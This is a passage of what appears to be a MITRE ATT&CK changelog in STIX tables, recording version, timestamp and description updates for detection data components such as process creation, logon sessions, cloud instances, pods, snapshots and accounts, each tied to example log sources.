| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.272689Z | 2022-10-20T20:22:45.613Z |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.272689Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Initial construction of a virtual machine image (ex: Azure Compute Service Images PUT) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271986Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271986Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Removal of a virtual machine image (ex: Azure Compute Service Images DELETE) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272030Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272030Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Contextual data about a virtual machine image such as name, resource group, state, or type |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272052Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272052Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Changes made to a virtual machine image, including setting and/or control data (ex: Azure Compute Service Images PATCH) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272009Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272009Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Initial construction of a new instance (ex: instance.insert within GCP Audit Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274569Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274569Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Removal of an instance (ex: instance.delete within GCP Audit Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274612Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274612Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| An extracted list of instances within a cloud environment (ex: instance.list within GCP Audit Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274654Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274654Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Contextual data about an instance and activity around it such as name, type, or status |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274633Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274633Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Changes made to an instance, including its settings and/or control data (ex: instance.addResourcePolicies or instances.setMetadata within GCP Audit Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274591Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274591Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Activation or invocation of an instance (ex: instance.start within GCP Audit Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274676Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274676Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Deactivation or stoppage of an instance (ex: instance.stop within GCP Audit Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274698Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274698Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| An object file that contains code to extend the running kernel of an OS, typically used to add support for new hardware (as device drivers) and/or filesystems, or for adding system calls |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272119Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272119Z | 2021-10-20T15:05:19.272Z |
| Old Description | New Description |
|---|---|
| Initial construction of a new user logon session (ex: Windows EID 4624, /var/log/utmp, or /var/log/wmtp) | Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.274403Z | 2022-10-07T16:18:20.802Z |
| description | Initial construction of a new user logon session (ex: Windows EID 4624, /var/log/utmp, or /var/log/wmtp) | Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp) |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.274403Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274381Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274381Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Code, strings, and other signatures that comprise a malicious payload |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.271748Z | 2022-10-20T20:19:58.845Z |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.271748Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.271726Z | 2022-10-20T20:20:12.165Z |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.271726Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272586Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272586Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Contextual data about a named pipe on a system, including pipe name and creating process (ex: Sysmon EIDs 17-18) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273848Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273848Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.274515Z | 2022-10-20T20:18:06.745Z |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.274515Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275043Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275043Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Logged network traffic data showing both protocol header and body values (ex: PCAP) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274493Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274493Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274471Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274471Z | 2021-10-20T15:05:19.274Z |
| Old Description | New Description |
|---|---|
| Operating system function/method calls executed by a process | Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272354Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272354Z | 2022-03-30T14:26:51.806Z |
| description | Operating system function/method calls executed by a process | Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21) |
| Description |
|---|
| Logged domain name system (DNS) data highlighting timelines of domain to IP address resolutions (ex: passive DNS) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275489Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275489Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Initial construction of a new pod (ex: kubectl apply|run) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272791Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272791Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| An extracted list of pods within a cluster (ex: kubectl get pods) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272897Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272897Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Changes made to a pod, including its settings and/or control data (ex: kubectl set|patch|edit) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272840Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272840Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Opening of a process by another process, typically to read memory of the target process (ex: Sysmon EID 10) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272320Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272320Z | 2021-10-20T15:05:19.272Z |
| Old Description | New Description |
|---|---|
| Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688) | The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.272195Z | 2022-10-07T16:15:56.932Z |
| description | Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688) | The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.) |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.272195Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272172Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272172Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Changes made to a process, or its contents, typically to write and/or execute code in the memory of the target process (ex: Sysmon EID 8) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272285Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272285Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272261Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272261Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Logged network traffic in response to a scan showing both protocol header and body values |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275251Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275251Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Contextual data about an Internet-facing resource gathered from a scan, such as running services or ports |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275230Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275230Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271629Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271629Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271606Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271606Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271671Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271671Z | 2021-10-20T15:05:19.271Z |
| Old Description | New Description |
|---|---|
| Launching a list of commands through a script file (ex: Windows EID 4104) | The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.272641Z | 2022-10-07T16:16:55.269Z |
| description | Launching a list of commands through a script file (ex: Windows EID 4104) | The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.) |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.272641Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273425Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273425Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273397Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273397Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273447Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273447Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Initial construction of a new snapshot (ex: AWS create-snapshot) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273503Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273503Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Removal of a snapshot (ex: AWS delete-snapshot) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273555Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273555Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| An extracted list of snapshots within a cloud environment (ex: AWS describe-snapshots) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273600Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273600Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Contextual data about a snapshot, which may include information such as ID, type, and status |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273578Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273578Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to a snapshot, such as metadata and control data (ex: AWS modify-snapshot-attribute) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273532Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273532Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Established, compromised, or otherwise acquired social media personas |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273649Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273649Z | 2021-10-20T15:05:19.273Z |
| Old Description | New Description |
|---|---|
| An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4625 or /var/log/auth.log) | An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.271547Z | 2022-10-07T16:19:46.282Z |
| description | An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4625 or /var/log/auth.log) | An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log) |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.271547Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Initial construction of a new account (ex: Windows EID 4720 or /etc/passwd logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271482Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271482Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Removal of an account (ex: Windows EID 4726 or /var/log access/authentication logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271504Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271504Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Contextual data about an account, which may include a username, user ID, environmental data, etc. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271456Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271456Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Changes made to an account, such as permissions and/or membership in specific groups (ex: Windows EID 4738 or /var/log access/authentication logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271526Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271526Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Initial construction of a cloud volume (ex: AWS create-volume) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275094Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275094Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Removal of a cloud volume (ex: AWS delete-volume) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275140Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275140Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| An extracted list of available volumes within a cloud environment (ex: AWS describe-volumes) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
